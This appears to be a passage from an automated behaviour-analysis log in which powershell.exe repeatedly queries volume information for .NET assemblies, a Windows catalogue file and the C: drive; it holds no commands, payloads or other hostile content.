                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
